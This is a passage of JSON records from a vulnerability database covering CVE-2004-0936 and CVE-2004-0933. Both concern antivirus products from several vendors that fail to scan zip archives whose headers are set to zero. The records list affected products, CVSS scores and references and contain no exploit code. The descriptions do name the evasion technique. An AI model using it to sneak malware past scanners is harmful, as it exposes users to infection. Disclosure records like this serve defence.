"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "archive::zip",
"scope": "eq",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "archive::zip",
"scope": "ne",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.14"
}
],
"sources": [
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
},
{
"db": "NVD",
"id": "CVE-2004-0936"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE Security Advisory\u203b labs@idefense.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0936",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2004-0936",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9366",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2004-0936",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#968818",
"trust": 0.8,
"value": "7.59"
},
{
"author": "CNNVD",
"id": "CNNVD-200501-300",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9366",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9366"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
},
{
"db": "NVD",
"id": "CVE-2004-0936"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "RAV antivirus allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. \nThis issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. \nLatest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. RAV is an antivirus software. Due to a problem with the processing of zip files in RAV, zip files can bypass antivirus detection",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0936"
},
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "VULHUB",
"id": "VHN-9366"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9366",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9366"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818",
"trust": 2.5
},
{
"db": "NVD",
"id": "CVE-2004-0936",
"trust": 2.0
},
{
"db": "BID",
"id": "11448",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9366",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9366"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
},
{
"db": "NVD",
"id": "CVE-2004-0936"
}
]
},
"id": "VAR-200501-0012",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9366"
}
],
"trust": 0.725
},
"last_update_date": "2025-04-03T22:21:48.841000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RAV AntiVirus zip Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146862"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0936"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/968818"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.8,
"url": "http://www.linuxsecurity.com/advisories/gentoo_advisory-5043.html"
},
{
"trust": 0.8,
"url": "http://rt.cpan.org/noauth/bug.html?id=8077"
},
{
"trust": 0.8,
"url": "http://www.idefense.com/application/poi/display?id=153"
},
{
"trust": 0.3,
"url": "http://download.mcafee.com/uk/updates/updates.asp"
},
{
"trust": 0.3,
"url": "http://www.nod32.com/"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.ravantivirus.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp"
},
{
"trust": 0.3,
"url": "/archive/1/378660"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9366"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
},
{
"db": "NVD",
"id": "CVE-2004-0936"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9366"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
},
{
"db": "NVD",
"id": "CVE-2004-0936"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-12-10T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2005-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-9366"
},
{
"date": "2004-10-18T00:00:00",
"db": "BID",
"id": "11448"
},
{
"date": "2004-10-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-300"
},
{
"date": "2005-01-27T05:00:00",
"db": "NVD",
"id": "CVE-2004-0936"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-01-14T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9366"
},
{
"date": "2009-07-12T08:06:00",
"db": "BID",
"id": "11448"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-300"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2004-0936"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Anti-virus software may not properly scan malformed zip archives",
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
],
"trust": 0.6
}
}
VAR-200501-0309
Vulnerability from variot - Updated: 2025-04-03 22:21Computer Associates (CA) InoculateIT 6.0, eTrust Antivirus r6.0 through r7.1, eTrust Antivirus for the Gateway r7.0 and r7.1, eTrust Secure Content Manager, eTrust Intrusion Detection, EZ-Armor 2.0 through 2.4, and EZ-Antivirus 6.1 through 6.3 allow remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. A remote attacker can craft a malicious zip archive and send it a vulnerable user. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. This issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200501-0309",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "small business suite",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "4.6"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.82"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "9.2"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "archive zip",
"scope": "eq",
"trust": 1.0,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "anti-virus d",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "antivirus rav antivirus for mail servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.4.2"
},
{
"model": "antivirus rav antivirus for file servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "1.0"
},
{
"model": "antivirus rav antivirus desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.6"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "5.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "4.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "3.0"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.013"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.012"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.011"
},
{
"model": "associates inoculateit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.1.13"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.3"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.2"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "archive::zip",
"scope": "eq",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "archive::zip",
"scope": "ne",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.14"
}
],
"sources": [
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
},
{
"db": "NVD",
"id": "CVE-2004-0933"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE Security Advisory\u203b labs@idefense.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0933",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2004-0933",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9363",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2004-0933",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200501-311",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9363",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9363"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
},
{
"db": "NVD",
"id": "CVE-2004-0933"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates (CA) InoculateIT 6.0, eTrust Antivirus r6.0 through r7.1, eTrust Antivirus for the Gateway r7.0 and r7.1, eTrust Secure Content Manager, eTrust Intrusion Detection, EZ-Armor 2.0 through 2.4, and EZ-Antivirus 6.1 through 6.3 allow remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. \nA remote attacker can craft a malicious zip archive and send it a vulnerable user. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. \nThis issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. \nLatest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0933"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "VULHUB",
"id": "VHN-9363"
}
],
"trust": 1.26
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9363",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9363"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2004-0933",
"trust": 2.0
},
{
"db": "BID",
"id": "11448",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9363",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9363"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
},
{
"db": "NVD",
"id": "CVE-2004-0933"
}
]
},
"id": "VAR-200501-0309",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9363"
}
],
"trust": 0.725
},
"last_update_date": "2025-04-03T22:21:48.814000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Multiple antivirus software Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146860"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
]
},
"problemtype_data": {
"@context": {
